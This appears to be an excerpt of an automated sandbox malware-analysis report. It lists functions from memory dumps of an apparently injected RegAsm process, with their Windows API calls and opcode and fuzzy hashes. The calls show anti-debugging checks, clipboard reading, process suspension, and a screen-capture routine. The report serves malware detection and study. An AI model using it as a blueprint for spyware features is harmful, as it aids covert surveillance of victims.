GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452117
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452168
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452228

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorInfoLastLocale$_free$_abort
String ID:
API String ID: 2829624132-0
Opcode ID: b894af2e73636fd6e8af7e748ba09ab431642972e93d3e8eb2aea65845f920f8
Instruction ID: 4b80d7ab7a7ff47978e382ad652e238d088576b56b9f239e8998609391b98480
Opcode Fuzzy Hash: b894af2e73636fd6e8af7e748ba09ab431642972e93d3e8eb2aea65845f920f8
Instruction Fuzzy Hash: B961C1315006079BDB289F25CE82BBB77A8FF05306F1041ABED15C6642F7B89D89DB58

Function 100060E2 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 100061DA
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 100061E4
UnhandledExceptionFilter.KERNEL32(?), ref: 100061F1

Memory Dump Source

Source File: 00000010.00000002.958379212.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000010.00000002.958369053.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.958379212.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
Instruction ID: da4494ed88e82f72bec2981ffd8ad716d5acf317cb547f21db02b9c2842d332f
Opcode Fuzzy Hash: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
Instruction Fuzzy Hash: 4A31D37490122C9BEB21DF24DD88B8DBBB8EF08350F5041DAE81CA7265E7709F818F55

Function 0043BB22 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0043BC1A
SetUnhandledExceptionFilter.KERNEL32 ref: 0043BC24
UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC31

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
Instruction ID: cbfc558a7ca4bb69983b526de44ffd1abc81b2e56a4044740c9350c1ecaeaada
Opcode Fuzzy Hash: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
Instruction Fuzzy Hash: E131C27590121DABCB21DF65DD89BCDBBB8AF08311F5051EAE80CA6251EB349F858F48

Function 00433837 Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,004334BF,00000034,?,?,00769D30), ref: 00433849
CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00433552,00000000,?,00000000), ref: 0043385F
CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,00433552,00000000,?,00000000,0041E251), ref: 00433871

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Crypt$Context$AcquireRandomRelease
String ID:
API String ID: 1815803762-0
Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
Instruction ID: 864202151b2ab8ebdb17250bb7e2999cce5b6c404a207f59f2405eb254ca80c1
Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
Instruction Fuzzy Hash: 83E09231308310FAFB341F25AC08F573AA5EB89B67F20093AF211E40E4D2568C018A5C

Function 10004AB4 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004AD5
TerminateProcess.KERNEL32(00000000,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004ADC
ExitProcess.KERNEL32 ref: 10004AEE

Memory Dump Source

Source File: 00000010.00000002.958379212.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000010.00000002.958369053.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.958379212.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
Instruction ID: 67c7ca3480f18a9b01e05da0926f82de4ad888d39fdd55e1be860e0f4a97641b
Opcode Fuzzy Hash: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
Instruction Fuzzy Hash: 04E04676000218AFEF01BF25CD48B493B6AEF013C1F128010F9088B029CB35ED52CA68

Function 004432B5 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,0044328B,?), ref: 004432D6
TerminateProcess.KERNEL32(00000000,?,0044328B,?), ref: 004432DD
ExitProcess.KERNEL32 ref: 004432EF

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
Instruction ID: 3be6e6b92543006147ef5d7b2afd166c5ab2c5ffe072a920593a5ac20c7500e8
Opcode Fuzzy Hash: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
Instruction Fuzzy Hash: D6E0BF31400244FBDF126F55DD0AA993B69FB40757F044469F90946232CB7ADE42CA98

Function 0040B70E Relevance: 4.5, APIs: 3, Instructions: 19clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(00000000), ref: 0040B711
GetClipboardData.USER32 ref: 0040B71D
CloseClipboard.USER32 ref: 0040B725

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Clipboard$CloseDataOpen
String ID:
API String ID: 2058664381-0
Opcode ID: d38c0863fa6e1407ff7c70a07519499014c38180332fc89bd075bae9f751f2b8
Instruction ID: a9752f6e69e3a39ef1c6dae57fb9473311d117e3f10fa11c4aa70225693e5904
Opcode Fuzzy Hash: d38c0863fa6e1407ff7c70a07519499014c38180332fc89bd075bae9f751f2b8
Instruction Fuzzy Hash: 4FE0EC31645320EFC2209B609C49B9A6754DF95F52F41843AB905AB2D5DB78CC40C6AD

Function 0041BB09 Relevance: 4.5, APIs: 3, Instructions: 19nativeCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,00415FFF,00000000), ref: 0041BB14
NtSuspendProcess.NTDLL(00000000), ref: 0041BB21
CloseHandle.KERNEL32(00000000), ref: 0041BB2A

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process$CloseHandleOpenSuspend
String ID:
API String ID: 1999457699-0
Opcode ID: 65307f06ae4da2db5a73601f3478dcd91fa25f5db04ba40a4c100ff3b6d3014e
Instruction ID: bc08a5c74f7a636e8823ed9fed2a710289fdff4cb0149baf3e3f1c1580a6a9c0
Opcode Fuzzy Hash: 65307f06ae4da2db5a73601f3478dcd91fa25f5db04ba40a4c100ff3b6d3014e
Instruction Fuzzy Hash: 96D05E36204231E3C32017AA7C0CE97AD68EFC5AA2705412AF804C26649B20CC01C6E8

Function 0041BB35 Relevance: 4.5, APIs: 3, Instructions: 19nativeCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,00416024,00000000), ref: 0041BB40
NtResumeProcess.NTDLL(00000000), ref: 0041BB4D
CloseHandle.KERNEL32(00000000), ref: 0041BB56

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process$CloseHandleOpenResume
String ID:
API String ID: 3614150671-0
Opcode ID: 2a3aa994b22e7efaa36e689b3453aa0ec17d897c0eb19943e791a895e5fd105b
Instruction ID: 907c56f48a3137ad3e5a70bb4b43f8813844e3fa30c0a1486a2e097c633c30d6
Opcode Fuzzy Hash: 2a3aa994b22e7efaa36e689b3453aa0ec17d897c0eb19943e791a895e5fd105b
Instruction Fuzzy Hash: B8D05E36104121E3C220176A7C0CD97AE69EBC5AA2705412AF904C32619B20CC01C6F4

Function 00434C52 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 134COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00434C6B

Strings

MZ@, xrefs: 00434D9A

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor
String ID: MZ@
API String ID: 2325560087-2978689999
Opcode ID: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
Instruction ID: b6e659610939bc40af268f25ffb2b9965a4fe426cdd66f7fc4435c5297b2c53a
Opcode Fuzzy Hash: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
Instruction Fuzzy Hash: EE515471D002089BEB24CF69D9856DEBBF4FB48354F24956BD819EB350D378AA80CF94

Function 10006580 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

., xrefs: 10006713

Memory Dump Source

Source File: 00000010.00000002.958379212.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000010.00000002.958369053.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.958379212.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
Instruction ID: 9046c4836333a0efab45ea1e09b7d9ff5bbd95f87beecc7c41f4b92e1cb642f0
Opcode Fuzzy Hash: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
Instruction Fuzzy Hash: 45313771800159AFEB14CF74CC84EEA7BBEDB49384F200198F81997259E6319E448B60

Function 0044E879 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

., xrefs: 0044EA0C

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: 6d782d14881953f3dc1aa7198760a6549ba6db1eba9a251ec7cea06479966fa1
Instruction ID: 28de479bcd0ee174bbf7ea2f8c467f6584cf945aa63ddb2e5cfeaaf716254919
Opcode Fuzzy Hash: 6d782d14881953f3dc1aa7198760a6549ba6db1eba9a251ec7cea06479966fa1
Instruction Fuzzy Hash: 233106B2900149AFEB249E7ACC85EEB7BBDEF45304F1001AEE819D7291E6349D458B54

Function 00451F9B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
Part of subcall function 00448215: _abort.LIBCMT ref: 00448293

EnumSystemLocalesW.KERNEL32(004520C3,00000001,00000000,?,lJD,?,004526F0,00000000,?,?,?), ref: 0045200D

Strings

lJD, xrefs: 00451FA0

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID: lJD
API String ID: 1084509184-3316369744
Opcode ID: 8fcc83528109b8aaf498f975bbbcb34ae0404b7acadb8afce226787919ce0173
Instruction ID: 7d3ee128790e63e9d167a680a676634a6e0759605f9449bc3b94779c572ada63
Opcode Fuzzy Hash: 8fcc83528109b8aaf498f975bbbcb34ae0404b7acadb8afce226787919ce0173
Instruction Fuzzy Hash: E51125372007019FDB189F39C8916BABB91FF8075AB14482EEE4687B41D7B9A946CB44

Function 00452036 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
Part of subcall function 00448215: _abort.LIBCMT ref: 00448293

EnumSystemLocalesW.KERNEL32(00452313,00000001,?,?,lJD,?,004526B4,lJD,?,?,?,?,?,00444A6C,?,?), ref: 00452082

Strings

lJD, xrefs: 0045203B

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID: lJD
API String ID: 1084509184-3316369744
Opcode ID: acb24ebe04e4856a9c83d3494bcbe1da60fd92419c71b9527b23937778bf3cf5
Instruction ID: 5d4b7cb44ca553c54ae5d492338df10e7871f8ce083c0ea6e3a4370b1d871309
Opcode Fuzzy Hash: acb24ebe04e4856a9c83d3494bcbe1da60fd92419c71b9527b23937778bf3cf5
Instruction Fuzzy Hash: 44F0FF322003055FDB245F798881A7A7B95FB82769B14446EFE428B681D7F9AC02C604

Function 004488ED Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,004444CA,?,00000004), ref: 00448940

Strings

GetLocaleInfoEx, xrefs: 00448908

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: GetLocaleInfoEx
API String ID: 2299586839-2904428671
Opcode ID: eeff4f7349616e56738bbc7b8787175557d4d7270555fb13a45f0baf29077f94
Instruction ID: 280d24bb3358c3803ceca68c405fa8cd3b52f77a8ef21af096b961815111c089
Opcode Fuzzy Hash: eeff4f7349616e56738bbc7b8787175557d4d7270555fb13a45f0baf29077f94
Instruction Fuzzy Hash: D1F02B31A40308F7DB119F61DC02F7E7B15DF08751F10056EFC0926261CE399D159A9E

Function 00452313 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
Part of subcall function 00448215: _abort.LIBCMT ref: 00448293

Part of subcall function 00448215: _free.LIBCMT ref: 00448274
Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452367

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$InfoLocale_abort
String ID:
API String ID: 1663032902-0
Opcode ID: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
Instruction ID: a0857f467e030380fa261c038abb83aeded24e37e53cd803257bf99bba5c3bcd
Opcode Fuzzy Hash: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
Instruction Fuzzy Hash: 0121B632550206ABDB249E35DD41BBA73A8EF05316F1001BFFD01D6242EBBC9D59CB58

Function 00452543 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
Part of subcall function 00448215: _abort.LIBCMT ref: 00448293

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,004522E1,00000000,00000000,?), ref: 0045256F

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale_abort_free
String ID:
API String ID: 2692324296-0
Opcode ID: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
Instruction ID: deb82abe2421a0f23b1c286da40711a82d27d1439ce4f734d0a93897c1f260ce
Opcode Fuzzy Hash: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
Instruction Fuzzy Hash: 3EF0993290011ABBDB245A20C916BBB3768EB01316F04046BEC05A3241FBB8FD05C698

Function 00448404 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00445888: EnterCriticalSection.KERNEL32(-0006D41D,?,00442FDB,00000000,0046E928,0000000C,00442F96,?,?,?,00445B26,?,?,004482CA,00000001,00000364), ref: 00445897

EnumSystemLocalesW.KERNEL32(004483BE,00000001,0046EAD0,0000000C), ref: 0044843C

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
Instruction ID: 9543b0ab25bad403ee5e8d2735ec903229a0e0f586434e65d0c90a277242bfd4
Opcode Fuzzy Hash: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
Instruction Fuzzy Hash: 6FF0AF72A50204EFE700EF69D946B8D37E0FB04725F10856AF414DB2A2CBB889808F09

Function 00451F50 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
Part of subcall function 00448215: _abort.LIBCMT ref: 00448293

EnumSystemLocalesW.KERNEL32(00451EA7,00000001,?,?,?,00452712,lJD,?,?,?,?,?,00444A6C,?,?,?), ref: 00451F87

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: 4d0c5cba832e86d7a557150270e3ca6bc4d6d332941df2bd00d727cb77582ebf
Instruction ID: 7090a925995da140c065d9916092b781359a33e81ca1c933e4536b6f4f09cf03
Opcode Fuzzy Hash: 4d0c5cba832e86d7a557150270e3ca6bc4d6d332941df2bd00d727cb77582ebf
Instruction Fuzzy Hash: A7F0203674020597CB04AF75C809B6A7F90EBC272AB06009AEE058B662C7799842C754

Function 0040F8D1 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004154FC,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,5.1.0 Pro), ref: 0040F8E5

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
Opcode Fuzzy Hash: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1

Function 00418E76 Relevance: 51.1, APIs: 28, Strings: 1, Instructions: 328windowmemoryCOMMON

Download Yara Rule

APIs

CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418E90
CreateCompatibleDC.GDI32(00000000), ref: 00418E9D

Part of subcall function 00419325: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419355

CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F13
DeleteDC.GDI32(00000000), ref: 00418F2A
DeleteDC.GDI32(00000000), ref: 00418F2D
DeleteObject.GDI32(00000000), ref: 00418F30
SelectObject.GDI32(00000000,00000000), ref: 00418F51
DeleteDC.GDI32(00000000), ref: 00418F62
DeleteDC.GDI32(00000000), ref: 00418F65
StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418F89
GetCursorInfo.USER32(?), ref: 00418FA7
GetIconInfo.USER32 ref: 00418FBD
DeleteObject.GDI32(?), ref: 00418FEC
DeleteObject.GDI32(?), ref: 00418FF9
DrawIcon.USER32(00000000,?,?,?), ref: 00419006
BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 0041903C
GetObjectA.GDI32(00000000,00000018,?), ref: 00419068
LocalAlloc.KERNEL32(00000040,00000001), ref: 004190D5
GlobalAlloc.KERNEL32(00000000,?), ref: 00419144
GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00419168
DeleteDC.GDI32(?), ref: 0041917C
DeleteDC.GDI32(00000000), ref: 0041917F
DeleteObject.GDI32(00000000), ref: 00419182
GlobalFree.KERNEL32(?), ref: 0041918D
DeleteObject.GDI32(00000000), ref: 00419241
GlobalFree.KERNEL32(?), ref: 00419248
DeleteDC.GDI32(?), ref: 00419258
DeleteDC.GDI32(00000000), ref: 00419263

Strings

DISPLAY, xrefs: 00418E89

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

